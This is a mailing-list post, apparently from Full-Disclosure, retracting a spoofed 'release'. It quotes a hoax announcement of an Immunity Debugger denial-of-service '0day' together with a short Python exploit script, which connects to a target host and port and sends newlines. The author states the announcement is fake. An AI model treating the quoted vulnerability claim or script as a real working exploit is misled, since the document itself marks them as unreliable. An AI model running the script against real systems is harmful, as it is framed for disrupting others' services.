Guys, this is a fake release, someone spoofed my email and sent this out as a joke to mock the wicd release from last week. Please note that if you click on the links, there is nothing there concerning this.
> > On 04/17/2012 02:48 AM, Adam Behnke wrote: >> Immunity Debugger Remote Denial of Service 0Day Tested against >> version 1.76 and 1.80 on Windows XP distributions >> >> Has not been tested for potential privilege escalation vectors. >> >> We first wrote about Immunity Debugger here: >> http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/ >> >> Discovered by a student that wishes to remain anonymous in the >> course CTF. This 0day exploit for Windows was discovered by a >> student in the InfoSec Institute Ethical Hacking class, during an >> evening CTF exercise. The student wishes to remain anonymous, he >> has contributed a python version of the 0day. A patch that can be >> applied to Windows has not been made available. You can find a >> python version of the exploit to copy and paste here: >> >> >> #!/usr/bin/python #Windows XP denial of service 0day exploit >> discovered on 4.9.12 by InfoSec Institute student #For full write >> up and description go to >> http://www.infosecinstitute.com/courses/ethical_hacking_training.html >> >> > import sys >> import os import time import getopt import socket >> >> class Error(Exception): def __init__(self, error): >> self.errorStr=error def __str__(self): return repr(self.errorStr) >> >> class Exploit(): >> >> def __init__(self, targetHost, targetPort): self.targetHost = >> targetHost >> >> def exploit(self, targetHost, targetPort): >> >> try: socket.inet_aton(targetHost) s = >> socket.socket(socket.AF_INET,socket.SOCK_STREAM) >> s.connect((targetHost,targetPort)) except socket.error: raise >> Error("Unable to exploit (Connect failed.)") sys.exit(0) >> >> # exploit try: s.sendto("\n\n\n", (targetHost, targetPort)) >> except: raise Error("Unable to exploit (Exploit failed.)") >> >> def usage(): print "[!] Usage:" print " ( -h, --help ):" print " >> Print this message." print " ( --targetHost= ): Target host." print >> " --targetHost=127.0.0.1" print " ( --targetPort= ): Target >> port." print " --targetPort=8888" >> >> def main(): print "[$] Windows XP 0Day" try: opts, args = >> getopt.getopt(sys.argv[1:], "h", ["help", "targetHost=", >> "targetPort="]) except getopt.GetoptError, err: # Print help >> information and exit: print '[!] Parameter error:' + str(err) # >> Will print something like "option -a not recognized" usage() >> sys.exit(0) >> >> targetHost=None targetPort=None for opt, arg in opts: if opt in >> ("-h", "--help"): usage() sys.exit(0) elif opt =="--targetHost": >> targetHost=arg elif opt =="--targetPort": targetPort=arg else: # I >> would be assuming to say we'll never get here. print "[!] Parameter >> error." usage() sys.exit(0) if not targetHost: print "[!] >> Parameter error: targetHost not set." usage() sys.exit(0) >> >> if not targetPort: print "[!] Parameter error: targetPort not >> set." usage() sys.exit(0) >> >> exploit = Exploit(targetHost, targetPort) >> >> print "[*] Attempting to exploit:" try: >> exploit.exploit(targetHost, int(targetPort)) except Error as >> error: print "[!] Exploit Error: %s" % (error.errorStr) exit(0) >> print "[*] Exploit appears to have worked." >> >> # Standard boilerplate to call the main() function to begin # the >> program. if __name__=='__main__': main() >> >> >> >> _______________________________________________ Full-Disclosure - >> We believe in it. Charter: >> http://lists.grok.org.uk/full-disclosure-charter.html Hosted and >> sponsored by Secunia - http://secunia.com/ > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.12 (GNU/Linux) > Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ > > iQIcBAEBAgAGBQJPjWNjAAoJEIH7slQlJAgKlw4P/0AzWqUuogRtF9wP2K91qFXq > QVHn9h6QlaVZ8SfunKn/zypiVmjqg2eJqSiqy8MzGIF1yRUf28W81Ugugqq62kvL > hFJcprsUhwnJCXZn+cWfPn64qoFKbN8uzIt85eWLcIBpIvdS7M5xm0g5Eva4hFrI > CqFmyfH+HwF4emZ0pecJ207ePetx51qj27Hgfd5Wey8W4Mx2svJpaTnCJMvcvg3i > FqE3/APG1qRrvFt0Qilqm6hpqSXhulQQQ8qw8k5BcHRn9FwJiDNQu/ykbSajOH4g > z452bxVBK/IQ7QQB+sqwvhi+fMIOE2f0Saw/SDgGUGLlUSPg3aQ/7pFjf3VxbaL9 > K7xG3GFQp8g3Lp5Lvr0JkhNoePb0smymSTQ5o9NoTTAKELB/9lqSHOD4HEEGR09J > DoZTYh7ee8DVPiGI+ttatYYw4mQAJR89E98skirX0Tntn2XQNPdlcejZwPWH56PV > jB4+uKIlsQ0KgnbK5OSLVRFgxcq9OSK/pUEZPLPuAVJrkf17TfhF8by0lJYmyW8T > 6Qf8GMiQjtP1ovL3BDuyxzAm9n3OpUMudXdtqBFq5XuagnImR2yZZkuTgkIXOt05 > 7PK28cqrKpTJixQNoiB4yLk65M1a8c8Ed/mXaHSFC04qn7RKhbMrdHmPzUnFpLCW > 4r6K58WTZ7qR2nTNKnQi > =Uoev > -----END PGP SIGNATURE----- > > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
